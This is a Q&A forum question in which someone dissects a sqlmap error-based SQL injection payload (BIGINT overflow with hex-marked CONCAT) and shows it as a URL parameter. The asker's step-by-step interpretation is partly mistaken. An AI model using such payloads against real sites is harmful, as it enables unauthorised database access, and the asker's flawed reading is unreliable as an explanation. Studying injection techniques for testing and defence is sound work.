# What does this SQL query in this SQLMAP payload do?

Tags: mysql, sql, sqlmap

I am trying *Error Based SQL injection* technique using [SQLMAP](http://sqlmap.org/). The technique as identified by SQLMAP is

> error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)

It will be great if someone can help give some clarity on the payload SQLMAP is using.

```
Payload: web/test?abc='' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b626b71,(SELECT (ELT(9092=9092,1))),0x71626b7071,0x78))s), 8446744073709551610, 8446744073709551610)))-- pprs
```

More specifically, what is happening in this SQL query

```
(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b626b71,(SELECT (ELT(9092=9092,1))),0x71626b7071,0x78))s), 8446744073709551610, 8446744073709551610)))
```

**Update1:**

The formatted query looks like this:

```
SELECT
   2*(IF((
   SELECT
      * 
   FROM
      (
         SELECT
            CONCAT(0x716b626b71, 
            (
               SELECT
(ELT(9092 = 9092, 1))
            )
, 0x71626b7071, 0x78)
      )
      s), 8446744073709551610, 8446744073709551610))
```

`SELECT (ELT(9092 = 9092, 1))` : Query output is 1 as `9092=9092` results to true(i.e 1) and ELT function returns the 1st argument i.e is 1

So the next sub-query is :
`SELECT CONCAT(0x716b626b71, 1, 0x71626b7071, 0x78)`  : Query Output results to concatenated string "qkbkq1qbkpqx" (after converting the hex to string)

However, the resultant sub-query `SELECT * FROM qkbkq1qbkpqx` gives an error saying `Every derived table must have its own alias`

**Update2:**

I missed the alias in the query as @tcadidot0 mentioned. So now the resultant sub-query is :
`SELECT * FROM qkbkq1qbkpqx s`

And the final query is:
`SELECT 2*(IF((SELECT * FROM qkbkq1qbkpqx s), 8446744073709551610, 8446744073709551610))`

If the table "qkbkq1qbkpqx" exists, then it returns `8446744073709551610` else it returns `8446744073709551610`, however 2 times the result leads to this error : `BIGINT value is out of range in '(2 * if((1 > 0),8446744073709551610,8446744073709551610))`, assuming `1>0` is the condition instead of the select statement.

Comment: See: [are-what-does-this-code-do-questions-on-topic-at-stackoverflow](https://meta.stackexchange.com/questions/79133/are-what-does-this-code-do-questions-on-topic-at-stackoverflow)

Comment: Include the `s` from this query `SELECT * FROM (SELECT CONCAT(0x716b626b71,(SELECT (ELT(9092=9092,1))),0x71626b7071,0x78)) s`

Comment: From this link answer https://stackoverflow.com/a/7142629/10910692 . "Big integers aren't actually limited to 20 digits, they're limited to the numbers that can be expressed in 64 bits (for example, the number 99,999,999,999,999,999,999 is not a valid big integer despite it being 20 digits long)".